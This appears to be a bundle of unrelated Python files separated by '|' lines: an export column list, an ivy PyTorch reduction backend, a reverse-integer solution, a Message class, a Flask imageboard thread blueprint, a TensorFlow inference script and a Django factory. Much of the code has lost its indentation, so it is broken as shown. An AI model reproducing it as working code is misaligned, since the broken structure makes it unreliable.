("Record ID", {'type': 'result', 'value': 'pk'}),
("First Name", {'type': 'result', 'value': 'first_name'}),
("Middle Name", {'type': 'result', 'value': 'middle_name'}),
("Last Name", {'type': 'result', 'value': 'last_name'}),
("Initiated Name", {'type': 'result', 'value': 'initiated_name'}),
("Email", {'type': 'result', 'value': 'email'}),
("Phone Number", {'type': 'result', 'value': 'phone_number'}),
("Address", {'type': 'result', 'value': 'address'}),
("City", {'type': 'result', 'value': 'city'}),
("ZIP code", {'type': 'result', 'value': 'postcode'}),
("State", {'type': 'result', 'value': 'state'}),
("Country", {'type': 'result', 'value': 'country'}),
("Yatra", {'type': 'result', 'value': 'yatra'}),
("Total Balance [USD]", {'type': 'result', 'value': 'balance_total_usd'}),
("Year Balance [USD]", {'type': 'result', 'value': 'balance_year_usd'}),
("Fin. Year Bal. [USD]", {'type': 'result', 'value': 'balance_financial_year_usd'}),
("Total Balance [INR]", {'type': 'result', 'value': 'balance_total_inr'}),
("Year Balance [INR]", {'type': 'result', 'value': 'balance_year_inr'}),
("Fin. Year Bal. [INR]", {'type': 'result', 'value': 'balance_financial_year_inr'}),
("Sources", {'type': 'result', 'value': 'sources'}),
("Promotions", {'type': 'result', 'value': 'promotions'}),
))
return export_data
|
# global
torch_scatter = None
import torch as torch
from typing import Tuple, Union, Optional
# local
import ivy
# Array API Standard #
# -------------------#
# noinspection PyShadowingBuiltins
def min(
x: torch.Tensor,
    axis: Optional[Union[int, Tuple[int]]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis == ():
if ivy.exists(out):
return ivy.inplace_update(out, x)
else:
return x
if not keepdims and not axis and axis != 0:
return torch.amin(input=x, out=out)
return torch.amin(input=x, dim=axis, keepdim=keepdims, out=out)
def sum(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int]]] = None,
dtype: Optional[Union[ivy.Dtype, torch.dtype]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if dtype is None:
if x.dtype in [torch.int8, torch.int16]:
dtype = torch.int32
elif x.dtype == torch.uint8:
dtype = torch.uint8
elif x.dtype in [torch.int32, torch.int64]:
dtype = torch.int64
if axis is None:
return torch.sum(input=x, dtype=dtype, out=out)
    elif type(axis) == list:
        return torch.sum(input=x, dim=axis, dtype=dtype, keepdim=keepdims, out=out)
    elif type(axis) == tuple:
        if len(axis) == 0:
            axis = 0
        else:
            # torch.sum accepts a tuple of dims directly; summing each dim
            # separately and stacking the partial results would be incorrect.
            return torch.sum(
                input=x, dim=axis, dtype=dtype, keepdim=keepdims, out=out
            )
return torch.sum(input=x, dim=axis, dtype=dtype, keepdim=keepdims, out=out)
def prod(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int]]] = None,
keepdims: bool = False,
*,
    dtype: Optional[torch.dtype] = None,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if dtype is None:
if x.dtype in [torch.int8, torch.int16]:
dtype = torch.int32
elif x.dtype == torch.uint8:
dtype = torch.uint8
elif x.dtype in [torch.int64, torch.int32]:
dtype = torch.int64
elif x.dtype == torch.bfloat16:
dtype = torch.float16
if axis is None:
axis = x.dim() - 1
    elif type(axis) == tuple:
        if len(axis) == 0:
            axis = x.dim() - 1
        else:
            # torch.prod only reduces a single dim at a time, so reduce the
            # requested axes one by one, highest index first so the remaining
            # dim indices stay valid when keepdims is False.
            for d in sorted(axis, reverse=True):
                x = torch.prod(input=x, dim=d, dtype=dtype, keepdim=keepdims)
            if ivy.exists(out):
                return ivy.inplace_update(out, x)
            return x
return torch.prod(input=x, dim=axis, dtype=dtype, keepdim=keepdims, out=out)
def mean(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int, ...]]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis is None:
num_dims = len(x.shape)
axis = list(range(num_dims))
if axis == ():
if ivy.exists(out):
return ivy.inplace_update(out, x)
else:
return x
return torch.mean(x, dim=axis, keepdim=keepdims, out=out)
# noinspection PyShadowingBuiltins
def max(
x: torch.Tensor,
    axis: Optional[Union[int, Tuple[int]]] = None,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis == ():
if ivy.exists(out):
return ivy.inplace_update(out, x)
else:
return x
if not keepdims and not axis and axis != 0:
return torch.amax(input=x, out=out)
return torch.amax(input=x, dim=axis, keepdim=keepdims, out=out)
def var(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int]]] = None,
correction: Union[int, float] = 0.0,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis is None:
num_dims = len(x.shape)
axis = tuple(range(num_dims))
if isinstance(axis, int):
return torch.var(x, dim=axis, keepdim=keepdims, unbiased=False, out=out)
dims = len(x.shape)
    axis = tuple(sorted(i % dims for i in axis))  # ascending, so the a - i shift below stays valid
for i, a in enumerate(axis):
if i == len(axis) - 1:
x = torch.var(
x,
dim=a if keepdims else a - i,
keepdim=keepdims,
unbiased=False,
out=out,
)
else:
x = torch.var(
x, dim=a if keepdims else a - i, keepdim=keepdims, unbiased=False
)
return x
def std(
x: torch.Tensor,
axis: Optional[Union[int, Tuple[int]]] = None,
correction: Union[int, float] = 0.0,
keepdims: bool = False,
*,
out: Optional[torch.Tensor] = None,
) -> torch.Tensor:
if axis is None:
num_dims = len(x.shape)
axis = tuple(range(num_dims))
if isinstance(axis, int):
return torch.std(x, dim=axis, keepdim=keepdims, unbiased=False, out=out)
dims = len(x.shape)
    axis = tuple(sorted(i % dims for i in axis))  # ascending, so the a - i shift below stays valid
for i, a in enumerate(axis):
if i == len(axis) - 1:
x = torch.std(
x,
dim=a if keepdims else a - i,
keepdim=keepdims,
unbiased=False,
out=out,
)
else:
x = torch.std(
x, dim=a if keepdims else a - i, keepdim=keepdims, unbiased=False
)
return x
# Extra #
# ------#
def einsum(equation: str, *operands: torch.Tensor) -> torch.Tensor:
return torch.einsum(equation, *operands)
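
# Illustrative usage sketch (assumption: standalone demo, not part of the
# backend module). These functions mirror Array API reductions on top of torch:
#
#     x = torch.arange(6, dtype=torch.float32).reshape(2, 3)
#     mean(x)           # tensor(2.5): reduces over all axes when axis is None
#     sum(x, axis=0)    # column sums; int inputs are promoted per the rules above
#     var(x, axis=(0, 1), keepdims=True)  # sequential reduction over both axes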
|
class Solution:
"""
@param n: the integer to be reversed
@return: the reversed integer
"""
def reverseInteger(self, n):
isNeg = n < 0
if isNeg:
n = -n
res = int(str(n)[::-1])
        # The signed 32-bit range is [-2**31, 2**31 - 1].
        if (isNeg and res > 2 ** 31) or (not isNeg and res > 2 ** 31 - 1):
            return 0
if isNeg:
return res * -1
return res
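
# Quick sanity checks (assumption: run as a script, not part of the original
# solution).
if __name__ == "__main__":
    s = Solution()
    assert s.reverseInteger(123) == 321
    assert s.reverseInteger(-123) == -321
    assert s.reverseInteger(1000000003) == 0  # reversed 3000000001 overflows int32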
|
import dateutil.parser
from six import PY2, text_type
class Message(object):
def __init__(self, data, user=None):
self._data = data
self.sent = dateutil.parser.parse(data['sent_date'])
self.body = data['message']
if user:
if data['from'] == user.id:
self.sender = user
if data['to'] == user.id:
self.to = user
if data['from'] == user._session.profile.id:
self.sender = user._session.profile
if data['to'] == user._session.profile.id:
self.to = user._session.profile
def __unicode__(self):
return self.body
    def __str__(self):
        # Python 2's __str__ must return bytes; on Python 3 it must return
        # str (text_type(self) would recurse back into __str__ there).
        if PY2:
            return text_type(self).encode("utf8")
        return self.body
def __repr__(self):
return repr(self.body)
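
# Illustrative sketch (assumption: field names inferred from __init__ above;
# the surrounding session/user API is not shown here):
#
#     msg = Message({
#         "sent_date": "2021-06-01T12:00:00Z",
#         "message": "hello",
#         "from": 1,
#         "to": 2,
#     })
#     msg.sent   # datetime parsed from sent_date
#     msg.body   # "hello"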
|
import time
from flask import Blueprint, render_template, redirect, url_for, flash, request, copy_current_request_context, session, make_response
from werkzeug.http import parse_etags
import cache
import captchouli
import cooldown
from model.Media import upload_size, storage
from model.Board import Board
from model.NewPost import NewPost
from model.NewThread import NewThread
from model.Post import Post, render_for_threads
from model.PostRemoval import PostRemoval
from model.PostReplyPattern import url_for_post
from model.Poster import Poster
from model.Slip import get_slip, get_slip_bitmask
from model.SubmissionError import SubmissionError
from model.Thread import Thread
from model.ThreadPosts import ThreadPosts
from post import InvalidMimeError, CaptchaError
import renderer
from shared import db, app
from thread import invalidate_board_cache
threads_blueprint = Blueprint('threads', __name__, template_folder='template')
threads_blueprint.add_app_template_global(url_for_post)
@app.context_processor
def get_captchouli():
def _get_captchouli():
return captchouli.request_captcha()
return dict(get_captchouli=_get_captchouli)
@threads_blueprint.route("/new/<int:board_id>")
def new(board_id):
extra_data = {}
if app.config.get("CAPTCHA_METHOD") == "CAPTCHOULI":
extra_data = renderer.captchouli_to_json(captchouli.request_captcha())
return renderer.render_new_thread_form(board_id, extra_data)
@threads_blueprint.route("/new", methods=["POST"])
def submit():
try:
thread = NewThread().post()
return redirect(url_for("threads.view", thread_id=thread.id))
except SubmissionError as e:
flash(str(e.args[0]))
return redirect(url_for("threads.new", board_id=e.args[1]))
except InvalidMimeError as e:
flash("Can't post attachment with MIME type \"%s\" on this board!" % e.args[0])
return redirect(url_for("threads.new", board_id=e.args[1]))
except CaptchaError as e:
flash("CAPTCHA error: %s" % e.args[0])
return redirect(url_for("threads.new", board_id=e.args[1]))
@threads_blueprint.route("/<int:thread_id>")
def view(thread_id):
thread = db.session.query(Thread).filter(Thread.id == thread_id).one()
thread.views += 1
db.session.add(thread)
db.session.commit()
current_theme = session.get("theme") or app.config.get("DEFAULT_THEME") or "stock"
response_cache_key = "thread-%d-%d-%s-render" % (thread_id, get_slip_bitmask(), current_theme)
cache_connection = cache.Cache()
view_key = "thread-%d-views" % thread_id
cached_views = cache_connection.get(view_key)
    fetch_from_cache = True
    if cached_views is None:
        fetch_from_cache = False
    else:
        cached_views = int(cached_views)
    # Re-render once views have grown past the configured ratio since the page
    # was cached; the default of 0 makes this always true, disabling cache hits.
    if fetch_from_cache and (thread.views / cached_views) >= app.config.get("CACHE_VIEW_RATIO", 0):
        fetch_from_cache = False
etag_value = "%s-%f" % (response_cache_key, time.time())
etag_cache_key = "%s-etag" % response_cache_key
if fetch_from_cache:
etag_header = request.headers.get("If-None-Match")
current_etag = cache_connection.get(etag_cache_key)
if etag_header:
parsed_etag = parse_etags(etag_header)
if parsed_etag.contains_weak(current_etag):
return make_response("", 304)
cache_response_body = cache_connection.get(response_cache_key)
if cache_response_body is not None:
cached_response = make_response(cache_response_body)
cached_response.set_etag(current_etag, weak=True)
cached_response.headers["Cache-Control"] = "public,must-revalidate"
return cached_response
posts = ThreadPosts().retrieve(thread_id)
render_for_threads(posts)
board = db.session.query(Board).get(thread.board)
num_posters = db.session.query(Poster).filter(Poster.thread == thread_id).count()
num_media = thread.num_media()
reply_urls = _get_reply_urls(posts)
thread_data = {}
for post in posts:
post["datetime"] = post["datetime"].strftime("%a, %d %b %Y %H:%M:%S UTC")
if post["media"]:
post["media_url"] = storage.get_media_url(post["media"], post["media_ext"])
post["thumb_url"] = storage.get_thumb_url(post["media"])
thread_data["posts"] = posts
extra_data = {}
if app.config.get("CAPTCHA_METHOD") == "CAPTCHOULI":
extra_data = renderer.captchouli_to_json(captchouli.request_captcha())
template = renderer.render_thread(thread_data, thread_id, extra_data)
uncached_response = make_response(template)
uncached_response.set_etag(etag_value, weak=True)
uncached_response.headers["Cache-Control"] = "public,must-revalidate"
cache_connection.set(view_key, str(thread.views))
cache_connection.set(response_cache_key, template)
cache_connection.set(etag_cache_key, etag_value)
return uncached_response
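
# Request flow for the cached path above (informal sketch of the logic in
# view(), not code from the original file):
#   1. The client sends If-None-Match with the weak ETag it last received.
#   2. If it matches the cached ETag, a bare 304 response is returned.
#   3. Otherwise the cached body is served with the current weak ETag.
#   4. On a cache miss the thread is re-rendered and the body, ETag and view
#      count are written back to the cache.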
@threads_blueprint.route("/<int:thread_id>/delete")
def delete(thread_id):
if not get_slip() or not (get_slip().is_admin or get_slip().is_mod):
flash("Only moderators and admins can delete threads!")
return redirect(url_for("threads.view", thread_id=thread_id))
thread = db.session.query(Thread).filter(Thread.id == thread_id).one()
board_id = thread.board
ThreadPosts().delete(thread_id)
invalidate_board_cache(board_id)
flash("Thread deleted!")
return redirect(url_for("boards.catalog", board_id=board_id))
@threads_blueprint.route("/<int:thread_id>/move")
def move(thread_id):
if not get_slip() or not (get_slip().is_admin or get_slip().is_mod):
flash("Only moderators and admins can move threads!")
return redirect(url_for("threads.view", thread_id=thread_id))
return render_template("thread-move.html", thread_id=thread_id)
@threads_blueprint.route("/<int:thread_id>/move", methods=["POST"])
def move_submit(thread_id):
if not get_slip() or not (get_slip().is_admin or get_slip().is_mod):
flash("Only moderators and admins can move threads!")
return redirect(url_for("threads.view", thread_id=thread_id))
thread = Thread.query.get(thread_id)
old_board = thread.board
new_board = Board.query.filter(Board.name == request.form["board"]).one()
thread.board = new_board.id
db.session.add(thread)
db.session.commit()
    invalidate_board_cache(old_board)
    # old_board is already an id; pass the new board's id for consistency.
    invalidate_board_cache(new_board.id)
flash("Thread moved!")
return redirect(url_for("threads.view", thread_id=thread_id))
@threads_blueprint.route("/<int:thread_id>/new")
def new_post(thread_id):
extra_data = {}
if app.config.get("CAPTCHA_METHOD") == "CAPTCHOULI":
extra_data = renderer.captchouli_to_json(captchouli.request_captcha())
return renderer.render_new_post_form(thread_id, extra_data)
@threads_blueprint.route("/<int:thread_id>/new", methods=["POST"])
def post_submit(thread_id):
try:
NewPost().post(thread_id)
except InvalidMimeError as e:
flash("Can't post attachment with MIME type \"%s\" on this board!" % e.args[0])
return redirect(url_for("threads.new_post", thread_id=thread_id))
except CaptchaError as e:
flash("CAPTCHA error: %s" % e.args[0])
return redirect(url_for("threads.new_post", thread_id=thread_id))
return redirect(url_for("threads.view", thread_id=thread_id) + "#thread-bottom")
@threads_blueprint.route("/post/<int:post_id>/delete")
def delete_post(post_id):
if not get_slip() or not (get_slip().is_admin or get_slip().is_mod):
flash("Only moderators and admins can delete posts!")
return redirect(url_for_post(post_id))
thread = db.session.query(Thread).filter(Thread.posts.any(Post.id == post_id)).one()
thread_id = thread.id
PostRemoval().delete(post_id)
flash("Post deleted!")
return redirect(url_for("threads.view", thread_id=thread_id))
@threads_blueprint.route("/post/<int:post_id>")
def render_post(post_id):
raw_post = db.session.query(Post).get(post_id)
thread_id = raw_post.thread
thread = db.session.query(Thread).get(thread_id)
dummy_array = ThreadPosts()._json_friendly([raw_post], thread)
render_for_threads(dummy_array)
post = dummy_array[0]
reply_urls = _get_reply_urls([post])
# TODO: properly set is_op, will be False most times, so set to that for now
is_op = False
return render_template("post-view-single.html", post=post, thread_id=thread_id, is_op=is_op, reply_urls=reply_urls)
@threads_blueprint.route("/<int:thread_id>/gallery")
def view_gallery(thread_id):
posts = ThreadPosts().retrieve(thread_id)
for post in posts:
# TODO: either streamline what gets sent to the frontend
# or automatically serialize datetimes so the below isn't necessary
del post["datetime"]
post["thumb_url"] = storage.get_thumb_url(post["media"])
post["media_url"] = storage.get_media_url(post["media"], post["media_ext"])
thread = db.session.query(Thread).filter(Thread.id == thread_id).one()
board = db.session.query(Board).get(thread.board)
return renderer.render_thread_gallery(board, thread_id, posts)
def _get_reply_urls(posts):
reply_ids = set()
for post in posts:
for reply in post["replies"]:
reply_ids.add(reply)
reply_urls = dict(map(lambda i: (i, url_for_post(i)), reply_ids))
return reply_urls
|
import tensorflow as tf
import numpy as np
FLAGS = tf.app.flags.FLAGS
def create_graph(model_file=None):
if not model_file:
model_file = FLAGS.model_file
#
with open(model_file, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(graph_def, name='')
#
#
# File paths
image_path = "c:/Users/vvpen/Desktop/素材/dog.png"
model_file = "d:/temp/ai/pb/frozen_graph.pb"
# Load the frozen graph into the default TF graph
create_graph(model_file)
with tf.Session() as sess:
    # Read the raw image bytes
    image_data = open(image_path, 'rb').read()
    # Decode the incoming image (tf.image.decode_jpeg also decodes PNGs)
    imgIn = tf.placeholder(name="input", dtype=tf.string)
    image = tf.image.decode_jpeg(imgIn, channels=3)
    # Add a batch dimension
    image = tf.expand_dims(image, 0)
    # Run the decode ops to get the image array, shape 1 * 32 * 32 * 3
    image_v = sess.run(image, feed_dict={imgIn: image_data})
    print(image_v.shape)
    print(type(image_v))
    # With the image array in hand, run the model directly
    softmax_tensor = sess.graph.get_tensor_by_name("CifarNet/Predictions/Softmax:0")
    predictions = sess.run(softmax_tensor, {"input:0": image_v})
    # predictions = sess.run(softmax_tensor, {"CifarNet:0": image_v})
    predictions = np.squeeze(predictions)
    print(predictions)
    print(np.argmax(predictions))
#
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import factory
from django.utils.lorem_ipsum import words
from .models import Article
class ArticleFactory(factory.django.DjangoModelFactory):
class Meta:
model = Article
@factory.lazy_attribute
def title(self):
return words(5, common=False)
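
# Illustrative usage sketch (assumption: run inside a test with database
# access, e.g. under pytest-django or Django's TestCase):
#
#     article = ArticleFactory()     # persisted Article with a random title
#     ArticleFactory.build()         # unsaved instance, no database hit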
|